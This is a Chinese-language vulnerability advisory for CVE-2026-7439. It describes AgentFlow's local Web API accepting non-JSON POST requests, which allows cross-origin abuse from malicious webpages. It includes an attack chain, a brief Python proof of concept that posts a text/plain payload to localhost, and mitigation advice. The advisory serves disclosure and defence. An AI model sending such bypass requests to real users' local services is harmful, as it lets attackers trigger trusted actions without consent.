CVE-2026-7439 CVSS 4.4 中危

CVE-2026-7439 AgentFlow 本地Web API内容类型验证绕过漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7439

漏洞类型

内容类型验证绕过

CVSS评分

4.4 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AgentFlow

漏洞概述

AgentFlow 的本地 Web API 在 POST /api/runs 和 POST /api/runs/validate 端点中存在安全缺陷，未强制执行 application/json 验证。攻击者可利用浏览器驱动或本地跨域请求发送非 JSON 内容类型，绕过信任边界检查，滥用 localhost API 对本地控制平面发起攻击。

技术细节

该漏洞的核心在于服务端对 Content-Type 请求头的校验逻辑缺失。AgentFlow 的本地 API 设计上期望处理 JSON 数据，但在实现时未拒绝 Content-Type 为 text/plain 或其他非 application/json 的 POST 请求。由于浏览器在发送简单跨域请求（如 Form Submit 或 Fetch with text/plain）时不会触发 CORS 预检，攻击者可以诱导用户访问恶意网页，利用此漏洞向本地 AgentFlow 服务发送构造的请求。这种绕过使得攻击者能够执行原本受信任边界保护的敏感操作，导致本地系统的机密性和完整性受到损害。

攻击链分析

STEP 1

1. 侦察与发现

攻击者确认目标系统上运行着存在漏洞的 AgentFlow 实例，且本地 Web API 监听在可访问的端口上。

STEP 2

2. 构造攻击载荷

攻击者编写 HTML 页面或脚本，构造指向 AgentFlow API (如 /api/runs) 的 POST 请求，并将 Content-Type 设置为 text/plain 以绕过验证。

STEP 3

3. 诱导执行

通过社会工程学诱导受害者访问恶意网页，或在本地环境下执行脚本，向 localhost 发送恶意请求。

STEP 4

4. 绕过与利用

AgentFlow API 接受非 JSON 类型的请求，信任边界被绕过，API 处理请求中的指令，导致敏感操作被执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target endpoint of the vulnerable AgentFlow instance
target_url = "http://127.0.0.1:PORT/api/runs"

# The payload intended to be processed by the API
# Sending as string with text/plain to bypass JSON validation
malicious_payload = "{\"command\": \"exploit\"}"

headers = {
    "Content-Type": "text/plain" 
}

try:
    response = requests.post(target_url, data=malicious_payload, headers=headers)
    if response.status_code == 200:
        print("[+] Exploit successful! Request accepted.")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

影响范围

AgentFlow (Commit < 1667fa3)

防御指南

临时缓解措施

建议立即更新 AgentFlow 到修复了该问题的版本。在无法立即更新的情况下，可以通过配置网络防火墙限制对本地 API 端口的访问，或使用反向代理层强制过滤非 application/json 类型的请求来缓解风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表